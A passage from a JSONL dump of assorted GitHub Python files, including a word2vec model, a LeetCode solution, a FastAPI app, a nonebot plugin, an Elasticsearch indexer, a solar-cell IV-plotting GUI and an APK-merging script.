0)\n d_h = np.matmul(dout.T,self.hirearchy_vectors)\n\n self.HSvector.backward(d_lin, self.lr)\n self.Embedding.backward(d_h, self.lr)\n\n '''\n print((self.grads[0] == self.Embedding.grads[0]).all())\n print((self.grads[1] == self.HSvector.grads[0]).all())\n '''\n def save(self, path):\n with open(path, 'wb') as f:\n pickle.dump(self.params, f, pickle.HIGHEST_PROTOCOL)\n\n\n def load(self, path):\n with open(\"./bestmodel.pickle\", 'rb') as f:\n x = pickle.load(f)\n\n self.params = x\n for param,layer in zip(self.params, self.layers):\n layer.params = [param]\n\n def query(self, word, word2idx, idx2word, top = 5):\n\n if word not in word2idx:\n print(\"%s는 corpus 안에 존재하지 않습니다\"%word)\n return\n \n W_in , _ = self.params\n\n query_id = word2idx[word]\n query_vec = W_in[query_id]\n query_vec = np.expand_dims(query_vec,0)\n\n #오름차순에 의해 정렬\n similarity = cosine_similarity(W_in , query_vec)\n\n #자기 자신 제외\n result = similarity.argsort(axis = 0)[-top:]\n\n print(word)\n\n for i in range(top):\n print(idx2word[int(result[i])] , similarity[int(result[i])])\n","repo_name":"JunhoKim94/Word2Vec_Study","sub_path":"model/HS_model.py","file_name":"HS_model.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"15477012999","text":"'''\nlog(2)太慢了\nlog(10)走起\n'''\ndef superPow_(a , b) :\n def divide2(b) :\n n = len(b)\n for i in range(n) :\n if b[i]%2 == 1 and i1 :\n b = b[1:]\n return b\n ret = 1\n while b!=[0] :\n if b[-1]%2 == 1 :\n ret = ret*a % 1337\n a = a*a%1337\n b = divide2(b)\n return ret\ndef superPow( a, b):\n if not b:\n return 1\n return pow(a, b.pop(), 1337)*superPow(pow(a, 10, 1337), b)%1337\nif __name__ == '__main__' :\n print(superPow(3,[4]))","repo_name":"severinzhong/practice","sub_path":"leetcode/372.py","file_name":"372.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26525536962","text":"#!/usr/bin/python\nfrom Foundation import *\nfrom AppKit import *\nimport time\nimport os\nimport os.path\n\ndef acornProxy():\n port = \"com.flyingmeat.Acorn4.JSTalk\"\n \n conn = None\n tries = 0\n \n while ((conn is None) and (tries < 10)):\n conn = NSConnection.connectionWithRegisteredName_host_(port, None)\n tries = tries + 1;\n \n if (not conn):\n print(\"Waiting for Acorn to launch\");\n time.sleep(1)\n \n if (not conn):\n print(\"Could not find a JSTalk connection\")\n return None\n \n return conn.rootProxy()\n \n \n# Grab the Acorn DO\nacorn = acornProxy();\n\n\nacorn.setPreference_forKey_(\".5\", \"jpegCompression\");\n\nfor f in os.listdir(\"Originals\"):\n path = os.path.abspath(\"Originals/\" + f)\n print(path)\n doc = acorn.open_(path);\n doc.flipCanvasWithDirection_(\"horizontal\");\n doc.saveDocument_(None)\n doc.close()\n \n # this is equally valid:\n # newDoc.dataOfType(\"public.png\").writeToFile(\"/tmp/foo.png\") \n ","repo_name":"ccgus/AcornSDK","sub_path":"python/Flip.py","file_name":"Flip.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"48"} +{"seq_id":"25081959282","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom modules.BigM.routers import BigM_routes\n\n# Init the fastAPI app\napp = FastAPI()\n\n# registering the modules routers\napp.include_router(BigM_routes.router)\n\n# Configuring CORSMiddleware\norigins = [\n \"http://localhost:3000\",\n \"localhost:3000\"\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)","repo_name":"Capital2/Big-M","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"23820276585","text":"\"\"\"\nModule that handles\nthe where to distribute the file\ncompressing and decompressing of the file\nusing to the required algorithm\n\"\"\"\n\nfrom image_data import work_with_image\nfrom video_data import work_with_video\nfrom audio_data import work_with_audio\nfrom txt_data import work_with_txt\n\ndef compress(path: str, algorithm: str):\n \"\"\"\n Args:\n - path: str, the path/name of file with extention\n - algorithm: str, name of the required algorithm\n Return:\n - file_path: str, decompressed file path\n \"\"\"\n file_type = path.split('.')[-1]\n\n # TEXT\n if file_type == 'txt':\n statistics = work_with_txt(path, algorithm)\n # PICTURE\n elif file_type in ['jpg', 'png', 'jpeg']:\n statistics = work_with_image(path, algorithm)\n # VIDEO\n elif file_type == 'mp4':\n statistics = work_with_video(path, algorithm)\n # AUDIO\n elif file_type in ['mp3', 'wav', 'flac']:\n statistics = work_with_audio(path, algorithm)\n else:\n print('File type not supported')\n return None, None\n return path, statistics\n","repo_name":"loginyuk/computer_project_2","sub_path":"compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38132838682","text":"import nonebot\nimport requests\nfrom quart import request\nfrom jinja2 import PackageLoader,Environment\nfrom .main import login\n\nbot = nonebot.get_bot() # 在此之前必须已经 init\n\nenv = Environment(loader=PackageLoader('webserver','templates'))\n\n#热更新借口,向此接口发送POST请求即可重启\n@bot.server_app.route('/update', methods=['POST'])\nasync def update():\n try:\n return 'OK'\n finally:\n requests.post(\"http://127.0.0.1:94/update\")#向本机94端口的一个小服务发送post\n\n\n@bot.server_app.route('/send', methods=['POST'])\nasync def send():\n try:\n user = (await request.form).get('who')\n text = (await request.form).get('what')\n await bot.send_private_msg(user_id=user, message=text)\n return \"ok\"\n except:\n return \"error\"\n\n\n","repo_name":"chnnnnng/nonebot-bai","sub_path":"bai/plugins/webserver/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8650562274","text":"import json\nimport sys\nimport uuid\n\nfrom elasticsearch import Elasticsearch\n\ndef main(file_name):\n es = Elasticsearch()\n\n with open(file_name) as f:\n for i, line in enumerate(f):\n paper = json.loads(line)\n es.index(\n index='papers',\n doc_type='paper',\n id=uuid.uuid4(),\n body=paper\n )\n if not i%1000:\n print(\n f'{i} docs indexed.',\n end='\\r'\n )\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","repo_name":"fmanen/OpenCSMap","sub_path":"elasticsearch/data/index_es.py","file_name":"index_es.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17698033102","text":"import pickle\nimport sys\nfrom experiment_suite.scheduler import sweep as sweep_lib\n\nif __name__ == '__main__':\n temp_name = sys.argv[1]\n sweep_file = f'/tmp/sweep_{temp_name}.py'\n machine_file = f'/tmp/machines_{temp_name}'\n run_file_path = sweep_lib.build_run_file_from_sweep_file(sweep_file, machine_file)\n out = {'experiment_data_dir': run_file_path}\n print(pickle.dumps(out, 0).decode())","repo_name":"chrisgrimm/scheduler","sub_path":"experiment_suite/scheduler/remote_executables/sweep_file_to_run_file.py","file_name":"sweep_file_to_run_file.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27231575882","text":"from rtctools_heat_network.pycml import Connector, Variable\n\nfrom .._internal.electricity_component import ElectricityComponent\n\n\nclass ElectricityPort(ElectricityComponent, Connector):\n \"\"\"\n The electricity port is used to model the variables at a port where two assets are connected.\n For electricity networks we model the electrical power (P), the voltage (V) and the current (I).\n \"\"\"\n\n def __init__(self, name, **modifiers):\n super().__init__(name, **modifiers)\n\n self.add_variable(Variable, \"Power\")\n self.add_variable(Variable, \"V\", min=0.0)\n self.add_variable(Variable, \"I\")\n\n\nclass ElectricityTwoPort(ElectricityComponent):\n \"\"\"\n For electricity components that transport power we have a two port component to allow for\n electricity flow in and out of the component.\n \"\"\"\n\n def __init__(self, name, **modifiers):\n super().__init__(name, **modifiers)\n\n self.add_variable(ElectricityPort, \"ElectricityIn\")\n self.add_variable(ElectricityPort, \"ElectricityOut\")\n","repo_name":"Nieuwe-Warmte-Nu/rtc-tools-heat-network","sub_path":"src/rtctools_heat_network/pycml/component_library/heat/electricity/electricity_base.py","file_name":"electricity_base.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70037331346","text":"import os\nimport tkinter as tk\nfrom collections import defaultdict\nfrom tkinter import messagebox, filedialog\n\nimport customtkinter as ctk\n\nfrom JV_plotter_GUI.Potentostats_check import PotentiostatFileChecker\nfrom JV_plotter_GUI.Plotter import DevicePlotter\nfrom JV_plotter_GUI.Slide_frame import SettingsPanel\nfrom JV_plotter_GUI.The_lower_frames import LowestFrame, ProceedFrame\nfrom JV_plotter_GUI.TimeLine_detector import TimeLineProcessor\nfrom JV_plotter_GUI.Top_frame import TopmostFrame\nfrom JV_plotter_GUI.Treeviews_frame import TableFrames\nfrom JV_plotter_GUI.settings import settings\nfrom JV_plotter_GUI.Additional_settings_panel import AdditionalSettings\nfrom JV_plotter_GUI.instruments import sort_inner_keys\n\n\nclass IVProcessingMainClass(ctk.CTkFrame):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(master=parent, *args, **kwargs)\n\n # Some variables\n self.parent = parent\n self.table_size = settings['Main frame']['table_size']\n self.potentiostat = 'All'\n self.file_directory = \"\"\n self.timeline_df = None\n self.files_selected = []\n self.added_iv = defaultdict(dict)\n self.aging_mode = False\n self.iaa = True\n self.open_wb = True\n self.color_wb = True\n self.dump_json = False\n\n # widgets\n self.pack(fill=ctk.BOTH, expand=True)\n self.table_frame = TableFrames(parent=self, height=400)\n self.additional_settings = AdditionalSettings(parent=self, start_pos=-0.25, end_pos=0)\n self.slide_frame = SettingsPanel(parent=self, start_pos=1.0, end_pos=0.75)\n self.label_1 = ctk.CTkLabel(self, text='Specify a directory with images to work with')\n self.label_1.pack()\n\n self.ask_directory_button = ctk.CTkButton(self, text='Choose a directory', command=lambda: self.ask_directory())\n self.ask_directory_button.pack()\n\n self.topmost_frame = TopmostFrame(parent=self, width=350, height=70, fg_color='transparent')\n self.topmost_frame.pack()\n\n self.table_frame.pack(pady=10)\n\n self.frame = ProceedFrame(parent=self, width=200, height=200)\n self.frame.pack(pady=10)\n\n self.lowest_frame = LowestFrame(self, fg_color='transparent')\n self.lowest_frame.pack(fill='x')\n\n def aging_mode_activator(self) -> None:\n \"\"\"\n Activate the \"Aging mode\"\n :return: None\n \"\"\"\n self.aging_mode = bool(self.slide_frame.aging_mode_checkbox.get())\n self.slide_frame.timeline_detector_button.configure(\n state='normal' if self.slide_frame.aging_mode_checkbox.get() else 'disabled')\n self.frame.button_selected.configure(\n state='disabled' if self.slide_frame.aging_mode_checkbox.get() else 'normal')\n self.list_files()\n\n def identical_active_areas_activator(self) -> None:\n \"\"\"\n Apply the same active areas for all devices\n :return: None\n \"\"\"\n self.iaa = bool(self.slide_frame.identical_areas_CheckBox.get())\n\n def open_wb_activator(self) -> None:\n \"\"\"\n Open workbook at the end of the code\n :return: None\n \"\"\"\n self.open_wb = bool(self.additional_settings.open_wb_checkbox.get())\n\n def color_wb_activator(self) -> None:\n \"\"\"\n Open workbook at the end of the code\n :return: None\n \"\"\"\n self.color_wb = bool(self.additional_settings.color_wb_checkbox.get())\n\n def dump_json_activator(self) -> None:\n \"\"\"\n Dump json into a file in the project root folder\n :return: None\n \"\"\"\n self.dump_json = bool(self.additional_settings.dump_json_checkbox.get())\n\n def exit(self) -> None:\n \"\"\"\n Close Tkinter and script\n :return: None\n \"\"\"\n self.quit()\n\n @staticmethod\n def change_appearance_mode_event(new_appearance_mode: str) -> None:\n \"\"\"\n Change the Tkinter appearance mode\n :param new_appearance_mode: Type of appearance mode\n :return: None\n \"\"\"\n ctk.set_appearance_mode(new_appearance_mode)\n\n def final_output(self, state) -> None:\n \"\"\"\n Choose the state to work on\n :param state: Selected some files or all the files\n :return: None\n \"\"\"\n if self.file_directory is None:\n messagebox.showerror('Warning!', \"Choose a folder to continue!\")\n return\n items = []\n if state == \"Selected\":\n # This should fetch selected items and not all top-level items\n items = list(self.table_frame.files_table.selection())\n elif state == \"All\":\n if self.aging_mode and self.timeline_df is None:\n messagebox.showerror('Warning!', \"For aging mode the timeline mast be set!\")\n return\n # This should fetch all items in the tree, including children of top-level items\n items = list(self.table_frame.files_table.get_children(''))\n for top_level_item in items:\n child_items = list(self.table_frame.files_table.get_children(top_level_item))\n items.extend(child_items)\n matched = self.table_frame.devices_by_folder(items)\n matched_sorted = sort_inner_keys(matched)\n DevicePlotter(parent=self, matched_devices=matched_sorted)\n self.exit()\n\n def expand_collapse(self, expand=True) -> None:\n \"\"\"\n Only expand/collapse item in treeview\n :param expand: expand if True, collapse if False\n :return: None\n \"\"\"\n for item in self.table_frame.files_table.get_children():\n self.treeview_expand_collapse(item, expand, select=False)\n\n def treeview_expand_collapse(self, item, expand_collapse, select=False) -> None:\n \"\"\"\n Expand/collapse treeview. Select all nested elements in a table and expand parental ones\n :param select: select expanded values\n :param expand_collapse: True for expanding, False - collapsing\n :param item: Item to select\n :return: None\n \"\"\"\n # Expand items\n self.table_frame.files_table.item(item, open=expand_collapse)\n if expand_collapse and select:\n self.table_frame.files_table.selection_add(item)\n # Select all nested (children) items\n if self.table_frame.files_table.get_children(item):\n for item_inner in self.table_frame.files_table.get_children(item):\n self.treeview_expand_collapse(item_inner, expand_collapse, select)\n\n def ask_directory(self) -> None:\n \"\"\"\n Built-in Tkinter function to return a str with a path\n :return: String with a path\n \"\"\"\n if not self.additional_settings.in_start_pos:\n self.additional_settings.animate_additional_settings(step=1)\n if not self.slide_frame.in_start_pos:\n self.slide_frame.animate(step=1)\n self.file_directory = filedialog.askdirectory(mustexist=True)\n if self.file_directory == \"\":\n self.label_1.configure(text='Specify a directory with images to work with')\n return\n self.list_files()\n self.label_1.configure(text=self.file_directory)\n\n def specify_timeline(self):\n path_to_timeline = filedialog.askopenfilename()\n if path_to_timeline == \"\":\n self.slide_frame.time_label.configure(text='Aging time: undefined.\\n Specify the path')\n return\n self.timeline_df = TimeLineProcessor(path_to_check=path_to_timeline).check_the_path()\n if self.timeline_df is None:\n self.slide_frame.time_label.configure(text='Aging time: failed to read.\\n Specify the path')\n else:\n max_time = round(self.timeline_df.max().values[0])\n self.slide_frame.time_label.configure(text=f'Aging time: {max_time} h')\n\n def set_potentiostat(self, event):\n \"\"\"\n Set potentiostat for filtering all unnecessary files\n :param event: Chose potentiostat through the ComboBox or choose All\n \"\"\"\n self.potentiostat = event\n self.list_files()\n\n def list_files(self):\n \"\"\"\n Update and fill the file table with filtered files\n \"\"\"\n if self.file_directory == \"\":\n return\n # Check if there are any items in the treeview\n for i in self.table_frame.files_table.get_children():\n self.table_frame.files_table.delete(i)\n abspath = os.path.abspath(self.file_directory).replace('\\\\', '/')\n root_node = self.table_frame.files_table.insert('', 'end', text=os.path.basename(abspath), open=True)\n self.added_iv.clear()\n self.process_directory(root_node, abspath)\n\n def process_directory(self, parent, path, is_root_call=True):\n \"\"\"\n Insert to a table and into the file_list filtered by extension type of files, including nested folders.\n Will show folders only if it contains required file.\n :param parent: Parent folder\n :param path: path to work with\n :param is_root_call: A boolean flag,\n that checks whether the current call to process_directory is the initial (root-level) call.\n :return: None\n \"\"\"\n depth = 1 if self.aging_mode else 0\n potentiostat_checker = PotentiostatFileChecker(parent=self, potentiostat_choice=self.potentiostat)\n\n for file in os.listdir(path):\n abspath = os.path.join(path, file).replace('\\\\', '/')\n b = path.replace(self.file_directory, '').count('/')\n if os.path.isfile(abspath):\n checking = potentiostat_checker.check_file(abspath)\n if checking[0]: # Insert a file only if it's potentiostats file\n potentiostat = checking[2]\n # data = [potentiostat, checking[1], abspath]\n data = [potentiostat, checking[-1]['Unit'], abspath]\n folder_name = os.path.basename(path)\n if folder_name not in self.added_iv:\n self.added_iv[folder_name] = {}\n self.added_iv[folder_name][file] = {\n \"path\": abspath,\n 'measurement device': potentiostat,\n 'encoding': checking[1],\n 'Sweeps': checking[3][\"Counts\"],\n 'data': checking[3][\"Data\"],\n 'unit': checking[3]['Unit'],\n 'Used files': file,\n 'Active area': None,\n 'Light Intensity': None,\n 'Distance to light source': None,\n }\n self.table_frame.files_table.insert(parent=parent, index=tk.END, text=file, values=data,\n tags='file')\n if os.path.isdir(abspath):\n device_detected = False\n for dir_path, dir_names, files in os.walk(abspath):\n for filename in files:\n f_name = os.path.join(dir_path, filename).replace('\\\\', '/')\n checking = potentiostat_checker.check_file(f_name)\n if checking[0]:\n device_detected = True\n if device_detected:\n if b == depth: # Nested folders with the deep of one only\n # allowed for the Processed folders\n return messagebox.showerror('Waring!', f\"Too many sub folders in\"\n f\" a folder {abspath}\")\n oid = self.table_frame.files_table.insert(parent, 'end', text=file, open=False, tags='folder',\n values=['', '', abspath])\n self.process_directory(oid, abspath, is_root_call=False)\n # Only run the following lines if it's the root call\n if is_root_call:\n self.table_frame.construct_active_areas_entries(data=self.added_iv, path=self.file_directory)\n","repo_name":"Rusya665/Solar_cells_measurements_plotting","sub_path":"JV_plotter_GUI/Main_frame.py","file_name":"Main_frame.py","file_ext":"py","file_size_in_byte":12126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26731386514","text":"import urllib \nfrom urllib.request import urlopen \nimport json \n \ndef getGeoForAddress(address): \n addressUrl = \"http://maps.googleapis.com/maps/api/geocode/json?address=\" + address \n addressUrlQuote = urllib.parse.quote(addressUrl, ':?=/') \n response = urlopen(addressUrlQuote).read().decode('utf-8') \n responseJson = json.loads(response) \n\n lat = responseJson.get('results')[0]['geometry']['location']['lat'] \n lng = responseJson.get('results')[0]['geometry']['location']['lng'] \n print(address + ': %f, %f' %(lat, lng)) \n return [lat, lng] \n\ngetGeoForAddress('South Waverly, PA')\ngetGeoForAddress('Boardman, OR')\ngetGeoForAddress('Ilwaco, WA')\n","repo_name":"YanHanOOP/MCM-ICM-Service-Outsource","sub_path":"MCM-ICM/city_info.py","file_name":"city_info.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35587504049","text":"# metroArrival.py\nimport requests\nimport requests.exceptions\nimport csv\nimport datetime\nimport os\nfrom time import sleep\n\n\ndef getMetroArrival():\n # 노선의 이름이 저장되어있는 list\n lineNames = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'Suin', 'Bundang', 'GyeonguiJoungang', 'Airport', 'GyeongChun']\n # 노선 코드와 역 ID가 저장될 list\n idTable = []\n # 각각의 노선에 대하여\n for lineName in lineNames:\n # 각 노선의 역 ID 들을 저장할 list\n stationIds = []\n # 노선 코드, 역 ID 정보 등이 저장되어있는 파일 open\n file = open('data/metroId/line' + lineName + '.csv', 'r', encoding='euc-kr')\n csvReader = csv.reader(file)\n # 각 행에 대해\n for line in csvReader:\n # 노선 코드 지정\n subwayNum = line[0]\n # stationIds에 역 ID 추가\n stationIds.append({'stationId': line[1]})\n # idTable에 해당 노선 정보 추가\n idTable.append({'subwayNum': subwayNum, 'stationIds': stationIds})\n file.close()\n # 무한 루프\n while True:\n # 2시 이후와 4시 이전에는 작동하지 않음\n if datetime.datetime.now().hour < 2 or datetime.datetime.now().hour >= 4:\n # 호출할 api의 주소\n url = 'http://m.bus.go.kr/mBus/subway/getStatnTrainInfo.bms?'\n # 각각의 노선에 대해\n for row in idTable:\n # 노선 코드\n subwayNum = row['subwayNum']\n # 해당 노선이 각 역에 대해\n for stationIds in row['stationIds']:\n # 역 ID\n stationId = stationIds['stationId']\n # 현재 시간\n now = datetime.datetime.now()\n # 20190610의 형식으로 변환\n date = now.strftime(\"%Y%m%d\")\n # 현재 요일 지정(0: 월요일 ~ 6:일요일)\n weekday = now.weekday()\n # 오전 0시부터 2시까지는 전날의 요일을 따라가므로, 전날로 취급\n if now.hour >= 0 and now.hour <= 2:\n weekday = weekday - 1\n # 월요일에서 전날로 넘어가 -1이 된다면, 일요일로 취급\n if weekday == -1:\n weekday = 6\n # 평일이면\n if weekday >= 0 and weekday <= 4:\n # weekday를 1로 지정\n weekday = 1\n # 토요일이면\n elif weekday == 5:\n # weekday를 2로 지정\n weekday = 2\n # 일요일이면\n else:\n # weekday을 3으로 지정\n weekday = 3\n try:\n # api를 POST method로 request\n response = requests.post(url + 'subwayId={}&statnId={}'.format(subwayNum, stationId))\n # 서버와의 통신에러가 뜰때, exception handling\n except requests.exceptions.ConnectionError:\n # 에러가 떴다고 출력\n print('Timeout Error!')\n # json type의 response를 저장\n result = response.json()\n # 해당역에 열차가 정차하지 않았다면 스킵\n if result['resultList'] is None:\n continue\n # 수집한 데이터를 저장할 디렉토리가 존재하지 않는다면\n if not os.path.exists('data/location/'+date):\n # 디렉토리 생성\n os.mkdir('data/location/'+date)\n # 수집한 노선에 대한 파일이 존재한다면\n if os.path.exists('data/location/'+date+'/'+subwayNum+'.csv'):\n # append 방식으로 open\n file = open('data/location/' + date + '/' + subwayNum + '.csv', 'a', encoding='euc-kr', newline='')\n # 파일이 존재하지 않는다면\n else:\n # write 방식으로 open\n file = open('data/location/'+date+'/'+subwayNum+'.csv', 'w', encoding='euc-kr', newline='')\n csvWriter = csv.writer(file)\n # 결과의 각 행에 대하여\n for resultRow in result['resultList']:\n # 상/하행 여부\n updownCode = ''\n # 열차가 역에 도착하지 않았다면 스킵.\n if resultRow['trainSttus'] != '1':\n continue\n # 실제 시간표의 상/하행 기준과 api의 상/하행 기준이 다른 노선이 존재하기에,\n # 상/하행 기준이 다른 노선이라면\n if subwayNum in ['1001', '1002', '1003', '1004', '1005', '1006', '1007', '1008', '1063', '1067', '1071', '1075']:\n if resultRow['updnLine'] == '하행' or resultRow['updnLine'] == '내선':\n updownCode = '1'\n else:\n updownCode = '2'\n # 상/하행 기준이 같은 노선이라면\n else:\n if resultRow['updnLine'] == '상행' or resultRow['updnLine'] == '내선':\n updownCode = '1'\n else:\n updownCode = '2'\n # 시,분초,단위 까지만 arrivedTime에 저장한다.\n arrivedTime = resultRow['arvlDt'][11:19]\n # 열차 번호\n trainNo = resultRow['trainNo']\n # 종착역명\n destination = resultRow['trainLineNm']\n # 파일에 쓰기\n csvWriter.writerow([stationId, trainNo, destination, arrivedTime, weekday, updownCode])\n print(resultRow)\n file.close()\n # 과부하 방지와 과도한 중복데이터 입력 방지를 위해 각 역별로 0.1초간 sleep\n sleep(0.1)\n\n\ngetMetroArrival()\n\n\n","repo_name":"JJuOn/HellDangLine","sub_path":"metroArrival.py","file_name":"metroArrival.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42294037199","text":"import numpy as np\nimport pandas as pd\nfrom otlang.sdk.syntax import Positional, OTLType\nfrom pp_exec_env.base_command import BaseCommand, Syntax\n\n\nclass AddCommand(BaseCommand):\n \"\"\"\n Make addition of two columns of dataframe\n a, b - columns or numbers must be added\n | add a b - creates a new df\n\n | add a b as c - creates new column \"c\" in the old df\n \"\"\"\n\n syntax = Syntax(\n [\n Positional(\"first_argument\", required=True, otl_type=OTLType.ALL),\n Positional(\"second_argument\", required=True, otl_type=OTLType.ALL),\n ],\n )\n use_timewindow = False # Does not require time window arguments\n idempotent = True # Does not invalidate cache\n\n def transform(self, df: pd.DataFrame) -> pd.DataFrame:\n self.log_progress(\"Start add command\")\n # that is how you get arguments\n first_add_argument = self.get_arg(\"first_argument\")\n if isinstance(first_add_argument.value, str):\n first_add = df[first_add_argument.value]\n else:\n first_add = first_add_argument.value\n\n second_add_argument = self.get_arg(\"second_argument\")\n if isinstance(second_add_argument.value, str):\n second_add = df[second_add_argument.value]\n else:\n second_add = second_add_argument.value\n result_column_name = second_add_argument.named_as\n\n if isinstance(first_add, (int, float)) and isinstance(second_add, (int, float)):\n if result_column_name != \"\" and not df.empty:\n first_add = np.array([first_add] * df.shape[0])\n second_add = np.array([second_add] * df.shape[0])\n else:\n first_add = np.array([first_add])\n second_add = np.array([second_add])\n\n\n self.logger.debug(f\"Command add get first positional argument = {first_add_argument.value}\")\n self.logger.debug(\n f\"Command add get second positional argument = {second_add_argument.value}\"\n )\n\n if result_column_name != \"\":\n if not df.empty:\n df[result_column_name] = first_add + second_add\n else:\n df = pd.DataFrame({result_column_name: first_add + second_add})\n self.logger.debug(f\"New column name: {result_column_name}\")\n\n else:\n df = pd.DataFrame(\n {\n f\"add_{first_add_argument.value}_{second_add_argument.value}\": first_add + second_add\n }\n )\n self.log_progress(\"Addition is completed.\", stage=1, total_stages=1)\n return df\n","repo_name":"ISGNeuroTeam/pp_cmd_add","sub_path":"add/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23890442612","text":"from unittest.mock import Mock, patch\nimport pytest\n\nfrom dysql import set_default_connection_parameters, databases\n\n\n@pytest.fixture(name='mock_create_engine')\ndef mock_create_engine_fixture():\n create_mock = patch('dysql.databases.sqlalchemy.create_engine')\n try:\n yield create_mock.start()\n finally:\n create_mock.stop()\n\n\ndef setup_mock_engine(mock_create_engine):\n \"\"\"\n build up the basics of a mock engine for the database\n :return: mocked engine for use and manipulation in testing\n \"\"\"\n mock_engine = Mock()\n mock_engine.connect().execution_options().__enter__ = Mock()\n mock_engine.connect().execution_options().__exit__ = Mock()\n set_default_connection_parameters('fake', 'user', 'password', 'test')\n\n # Clear out the databases before attempting to mock anything\n databases.DatabaseContainerSingleton().clear()\n mock_create_engine.return_value = mock_engine\n return mock_engine\n\n\ndef _verify_query_params(mock_engine, expected_query, expected_args):\n _verify_query(mock_engine, expected_query)\n _verify_query_args(mock_engine, expected_args)\n\n\ndef _verify_query(mock_engine, expected_query):\n execute_call = mock_engine.connect.return_value.execution_options.return_value.execute\n execute_call.assert_called()\n\n query = execute_call.call_args[0][0].text\n assert query == expected_query\n\n\ndef _verify_query_args(mock_engine, expected_args):\n execute_call = mock_engine.connect.return_value.execution_options.return_value.execute\n query_args = execute_call.call_args[0][1]\n\n assert query_args\n for expected_key in expected_args:\n expected_value = expected_args[expected_key]\n assert query_args.get(expected_key)\n assert expected_value == query_args[expected_key]\n","repo_name":"adobe/dy-sql","sub_path":"dysql/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"74026197265","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport platform\nimport shutil\nimport sys\nfrom distutils.spawn import find_executable\n\nfrom subprocess import call, STDOUT\ntry:\n from subprocess import DEVNULL\nexcept ImportError:\n import os\n DEVNULL = open(os.devnull, 'wb')\n\n\nconst_dir_tmp = \".mergeapks\"\nconst_file_target_file = \"target\"\nconst_file_result_file = \"result\"\nconst_ext_apk = \".apk\"\nconst_apk_file_apktool_config = 'apktool.yml'\nconst_sign_config_properties_file = 'mergeapks.sign.properties'\n\n\ndef print_help():\n print(\"\")\n print(\"MergeApks is a tool that merges multiple .apk files of the same application but with different resource sets (native libraries, locales, dpi) into one single universal .apk file\")\n print(\"Usage: python mergeapks.py PATH_TO_FILE_01.apk PATH_TO_FILE_02.apk PATH_TO_FILE_03.apk ...\")\n print(\"\")\n\n\ndef get_param_apk_file_name(apk_number):\n return sys.argv[apk_number]\n\n\ndef get_param_apk_abs_path(apk_number):\n return os.path.abspath(get_param_apk_file_name(apk_number))\n\n\ndef check_sys_args():\n if len(sys.argv) < 3:\n return False\n\n for apk_number in range(1, len(sys.argv)):\n apk_file_name = get_param_apk_file_name(apk_number)\n if not apk_file_name.endswith(const_ext_apk):\n return False\n abspath_to_apk_file = os.path.abspath(apk_file_name)\n if not os.path.exists(abspath_to_apk_file):\n return False\n\n return True\n\n\ndef execute_command_os_system(command):\n rc = os.system(command)\n return rc\n\n\ndef execute_command_subprocess(command_tokens_list):\n rc = call(command_tokens_list, stdout=DEVNULL, stderr=STDOUT)\n return rc\n\n\ndef is_windows():\n return platform.system() == \"Windows\"\n\n\ndef windows_hide_file(file_path):\n execute_command_subprocess([\"attrib\", \"+h\", file_path])\n\n\ndef create_or_recreate_dir(dir_path):\n if os.path.exists(dir_path):\n if os.path.isdir(dir_path):\n shutil.rmtree(dir_path)\n else:\n os.remove(dir_path)\n os.mkdir(dir_path)\n if is_windows():\n windows_hide_file(dir_path)\n\n\ndef check_if_executable_exists_in_path(executable):\n path_to_cmd = find_executable(executable)\n return path_to_cmd is not None\n\n\ndef create_tmp_dir(working_dir):\n path_dir_tmp = os.path.abspath(os.path.join(working_dir, const_dir_tmp))\n create_or_recreate_dir(path_dir_tmp)\n return path_dir_tmp\n\n\ndef file_split_name_and_extension(file_path):\n split = os.path.splitext(file_path)\n return split[0], split[1]\n\n\ndef get_do_not_compress_lines(config_file_lines):\n index_start = -1\n index_end = -1\n result = list()\n start_block_literal = 'doNotCompress:'\n prefix_target_line = '- '\n opened = False\n for index, line in enumerate(config_file_lines):\n if not opened and line.startswith(start_block_literal):\n opened = True\n if index_end == -1 and index_start == -1:\n index_start = index + 1\n elif opened and line.startswith(prefix_target_line):\n result.append(line)\n elif opened and not line.startswith(prefix_target_line):\n if index_start != -1 and index_end == -1:\n index_end = index - 1\n 